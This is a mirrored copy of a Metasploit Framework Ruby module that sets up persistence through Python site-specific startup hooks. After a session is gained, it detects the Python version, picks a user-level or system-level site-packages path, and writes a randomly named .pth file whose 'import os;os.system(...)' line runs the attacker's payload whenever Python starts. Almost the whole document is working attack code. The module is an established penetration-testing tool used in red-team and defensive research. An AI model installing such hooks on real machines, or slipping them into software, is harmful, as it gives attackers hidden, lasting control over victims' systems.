Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/persistence/python_site_specific_hook.rb
28788 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

8


9
  include Msf::Post::Linux::Priv

10
  include Msf::Post::File

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::FileDropper

13
  include Msf::Exploit::Local::Persistence

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Python Site-Specific Hook Persistence',

21
        'Description' => %q{

22
          This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'msutovsky-r7', # msf module

27
        ],

28
        'Platform' => ['linux', 'windows', 'osx'],

29
        'Arch' => [ ARCH_CMD ],

30
        'SessionTypes' => [ 'meterpreter', 'shell' ],

31
        'Targets' => [[ 'Auto', {} ]],

32
        'References' => [

33
          [ 'URL', 'https://docs.python.org/3/library/site.html'],

34
          ['ATT&CK', Mitre::Attack::Technique::T1546_018_PYTHON_STARTUP_HOOKS],

35
        ],

36
        'DisclosureDate' => '2012-09-29',

37
        'DefaultTarget' => 0,

38
        'Notes' => {

39
          'Stability' => [CRASH_SAFE],

40
          'Reliability' => [REPEATABLE_SESSION],

41
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]

42
        }

43
      )

44
    )

45
    register_options([

46
      OptString.new('PYTHON_HOOK_PATH', [false, 'The path to Python site-specific hook directory']),

47
      OptEnum.new('EXECUTION_TARGET', [true, 'Selects if persistence is installed under current user or for all users', 'USER', ['USER', 'SYSTEM']])

48
    ])

49
  end

50


51
  def get_hooks_path

52
    unless datastore['PYTHON_HOOK_PATH'].blank?

53
      @hooks_path = datastore['PYTHON_HOOK_PATH']

54
      return

55
    end

56
    case session.platform

57
    when 'windows', 'win'

58


59
      case datastore['EXECUTION_TARGET']

60
      when 'USER'

61
        @hooks_path = expand_path("%USERPROFILE%/AppData/Local/Programs/Python/Python#{@python_version.sub('.', '')}/Lib/site-packages/")

62
      when 'SYSTEM'

63
        @hooks_path = "C:/Python#{@python_version.sub('.', '')}/Lib/site-packages/"

64
      end

65
    when 'osx', 'linux'

66


67
      case datastore['EXECUTION_TARGET']

68
      when 'USER'

69
        @hooks_path = expand_path("$HOME/.local/lib/python#{@python_version}/site-packages/")

70
      when 'SYSTEM'

71
        @hooks_path = "/usr/local/lib/python#{@python_version}/dist-packages/"

72
      end

73
    end

74
  end

75


76
  def get_python_version

77
    case session.platform

78
    when 'windows', 'win'

79
      cmd_exec('cmd.exe /c python3.exe --version 2> nul || python2.exe --version 2> nul || python.exe --version 2> nul || py.exe --version 2> nul') =~ /(\d+.\d+).\d+/

80
    when 'osx', 'linux'

81
      cmd_exec('python3 --version 2>/dev/null || python2 --version 2> /dev/null || python --version 2>/dev/null') =~ /(\d+.\d+).\d+/

82
    end

83


84
    @python_version = Regexp.last_match(1)

85
  end

86


87
  def check

88
    get_python_version

89


90
    return CheckCode::Safe('Python not present on the system') unless @python_version

91


92
    CheckCode::Vulnerable('Python is present on the system')

93
  end

94


95
  def install_persistence

96
    get_python_version unless @python_version

97
    print_status("Detected Python version #{@python_version}")

98
    get_hooks_path unless @hooks_path

99


100
    mkdir(@hooks_path) if session.platform == 'osx' || session.platform == 'linux'

101


102
    fail_with(Failure::NotFound, "The hooks path #{@hooks_path} does not exists") unless directory?(@hooks_path)

103
    # check if hooks path writable

104
    begin

105
      # windows only ps payloads have writable? so try that first

106
      fail_with(Failure::NoAccess, "No permission to write to #{@hooks_path}") unless writable?(@hooks_path)

107
    rescue RuntimeError

108
      filename = @hooks_path + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))

109
      write_file(filename, '')

110
      fail_with(Failure::NoAccess, "No permission to write to #{@hooks_path}") unless exists?(filename)

111
      rm_f(filename)

112
    end

113


114
    print_status("Got path to site-specific hooks #{@hooks_path}")

115


116
    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)

117


118
    fail_with(Failure::PayloadFailed, 'Failed to create malicious hook') unless write_file("#{@hooks_path}#{file_name}.pth", %(import os;os.system("#{payload.encoded}") ))

119


120
    print_good("Successfully created malicious hook #{@hooks_path}#{file_name}.pth")

121
    @clean_up_rc << "rm #{@hooks_path}#{file_name}.pth\n"

122
  end

123
end

124


125